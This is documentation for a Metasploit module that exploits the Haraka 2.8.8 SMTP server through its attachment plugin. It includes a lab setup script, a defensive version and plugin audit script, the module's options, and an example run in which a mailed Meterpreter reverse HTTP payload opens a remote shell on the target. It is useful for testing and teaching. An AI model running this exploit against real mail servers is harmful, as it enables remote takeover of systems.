## Vulnerable Application

Set up the vulnerable Haraka install by running this script on Ubuntu, Debian or a similar distribution:

```
# Install nodejs and npm
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
sudo apt install nodejs

# Haraka setup
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
tar xvzf v2.8.8.tar.gz
cd Haraka-2.8.8/
npm install npm
npm install

haraka -i haraka

cat << EOF > haraka/config/plugins
access
rcpt_to.in_host_list
data.headers
attachment
test_queue
max_unrecognized_commands
EOF

echo haraka.test >> haraka/config/host_list

# Launch haraka as root
sudo haraka -c haraka
```
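
A defender-side check for the two conditions this lab setup creates, written as an added example (not part of the original module documentation or the Haraka project): it reports whether a Haraka tree is the 2.8.8 release installed above and whether the `attachment` plugin from the plugins list is enabled. The function names, the file arguments and treating `attachment` as the plugin of interest are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a Haraka tree for the lab conditions set up above.
# Assumption: FLAGGED_VERSIONS holds only the release this page installs.
FLAGGED_VERSIONS="2.8.8"

# Print the "version" value from a package.json file.
haraka_version() {
    sed -n 's/^[[:space:]]*"version"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' "$1" | head -n 1
}

# Succeed if plugin $2 is enabled in plugins file $1 (one plugin per line,
# "#" starts a comment, so a commented-out entry does not count).
plugin_enabled() {
    sed -e 's/#.*//' -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' "$1" | grep -qxF -- "$2"
}

# audit_haraka <package.json> <plugins file>
# Prints findings and returns how many of the two conditions matched (0-2).
audit_haraka() {
    findings=0
    ver=$(haraka_version "$1")
    for v in $FLAGGED_VERSIONS; do
        if [ "$ver" = "$v" ]; then
            echo "FINDING: Haraka $ver is a flagged release"
            findings=$((findings + 1))
        fi
    done
    if plugin_enabled "$2" attachment; then
        echo "FINDING: attachment plugin is enabled"
        findings=$((findings + 1))
    fi
    [ "$findings" -eq 0 ] && echo "OK: neither condition matched"
    return "$findings"
}

# Demo on constructed files that mirror the setup script.
demo() {
    d=$(mktemp -d)
    printf '{\n  "name": "Haraka",\n  "version": "2.8.8"\n}\n' > "$d/package.json"
    printf 'access\n# dkim_sign\nattachment\ntest_queue\n' > "$d/plugins"
    rc=0; audit_haraka "$d/package.json" "$d/plugins" || rc=$?
    rm -rf "$d"
    return "$rc"
}
demo || true
```

On a real install, pass the `package.json` from the Haraka source tree and the `config/plugins` file from the directory given to `haraka -c`.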
## Options

**from_email**

String used in the SMTP `MAIL FROM` command

**to_email**

String used as the recipient address in the SMTP `RCPT TO` command

**lhost**

The address to serve the payload from

**rhost**

The address or hostname to target

**payload**

Any compatible Metasploit payload

## Example Run

```
msf > use exploit/linux/smtp/haraka
msf exploit(haraka) > set email_to root@haraka.test
email_to => root@haraka.test
msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http
payload => linux/x64/meterpreter_reverse_http
msf exploit(haraka) > run
[*] Started HTTP reverse handler on http://192.168.1.1:8080
[*] Exploiting...
[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3
[*] Sending mail to target server...
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit
msf exploit(haraka) >
```